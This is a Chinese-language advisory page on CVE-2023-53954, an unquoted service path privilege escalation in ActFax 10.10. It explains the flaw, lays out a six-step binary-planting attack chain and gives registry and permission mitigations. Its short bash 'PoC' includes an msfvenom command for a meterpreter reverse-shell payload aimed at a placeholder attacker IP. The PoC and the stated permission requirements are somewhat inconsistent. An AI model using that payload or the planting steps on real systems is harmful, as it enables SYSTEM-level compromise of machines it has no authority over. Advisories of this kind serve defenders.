IPBUF安全漏洞报告
English
CVE-2023-53954 CVSS 6.2 中危

CVE-2023-53954 ActFax未引号服务路径权限提升漏洞

披露日期: 2025-12-19

漏洞信息

漏洞编号
CVE-2023-53954
漏洞类型
未引号服务路径漏洞
CVSS评分
6.2 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
ActFax 10.10 (ActiveFaxServiceNT服务)

相关标签

未引号服务路径权限提升ActFaxActiveFaxServiceNT本地攻击路径劫持Windows服务CVE-2023-53954

漏洞概述

CVE-2023-53954是发现于ActFax 10.10版本中的一个本地权限提升漏洞。该漏洞源于ActiveFaxServiceNT服务的可执行文件路径未使用引号包裹,导致Windows服务在解析路径时存在歧义。攻击者利用此漏洞可以劫持服务启动过程,在服务重启时以SYSTEM高权限执行任意恶意代码。成功利用此漏洞的攻击者可以完全控制受影响的系统,执行恶意操作、窃取敏感数据或部署后门。由于该漏洞需要攻击者具有目标系统的本地访问权限和Program Files目录的写入权限,因此主要威胁场景为内部人员滥用或已被初步入侵的主机进行横向移动。

技术细节

该漏洞的根本原因在于Windows服务配置中的路径解析机制。当一个服务的可执行文件路径包含空格且未使用引号包裹时,Windows会从左到右解析路径,并在遇到空格时将其作为路径分隔符处理。例如,如果服务路径为C:\Program Files\ActFax\ActSrvNT.exe且未加引号,Windows会首先尝试执行C:\Program.exe,如果不存在则尝试C:\Program Files\ActSrvNT.exe。攻击者可以利用这一特性,在C:\目录下放置名为Program.exe的恶意可执行文件,当ActiveFaxServiceNT服务启动时,系统会错误地执行攻击者植入的恶意程序,从而以SYSTEM权限运行任意代码。这种攻击方式被称为"路径劫持"或"二进制植入"攻击,是权限提升的经典手法之一。

攻击链分析

STEP 1
步骤1
攻击者获得目标系统的本地访问权限,并确认具有Program Files目录的写入权限
STEP 2
步骤2
攻击者检查ActiveFaxServiceNT服务的配置,确认其可执行文件路径未使用引号包裹
STEP 3
步骤3
攻击者创建一个恶意可执行文件(如Program.exe),包含后门代码或恶意payload
STEP 4
步骤4
将恶意可执行文件放置在服务路径中空格之前的目录(如C:\),利用Windows路径解析歧义
STEP 5
步骤5
等待或触发ActiveFaxServiceNT服务重启(如系统更新、管理员操作或系统重启)
STEP 6
步骤6
服务启动时错误地执行攻击者植入的恶意程序,以SYSTEM高权限运行,完成权限提升

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # CVE-2023-53954 PoC - ActFax Unquoted Service Path # Target: ActFax 10.10 - ActiveFaxServiceNT Service # This PoC demonstrates the unquoted service path vulnerability TARGET_SERVICE="ActiveFaxServiceNT" MALICIOUS_BINARY="Program.exe" INSTALL_PATH="C:\\Program Files\\ActFax" PAYLOAD="msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe -o Program.exe" echo "[+] Checking service configuration..." sc qc "$TARGET_SERVICE" echo "[+] Checking if C:\\ is writable..." # In a real attack, this would require admin privileges to write to C:\ echo "[!] Place malicious executable at: C:\\$MALICIOUS_BINARY" echo "[+] To create payload:" echo " $PAYLOAD" echo "[+] When service restarts, payload will execute with SYSTEM privileges"

影响范围

ActFax < 10.10 (所有版本)
ActFax 10.10 (确认受影响)

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1) 使用icacls命令限制目录权限,移除非必要用户对Program Files目录的写入权限;2) 手动为服务路径添加引号(修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ActiveFaxServiceNT的ImagePath值为"C:\Program Files\ActFax\ActSrvNT.exe");3) 监控安全日志中与服务启动相关的异常事件;4) 考虑暂时禁用ActiveFax服务(如果业务允许),直至完成修复。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表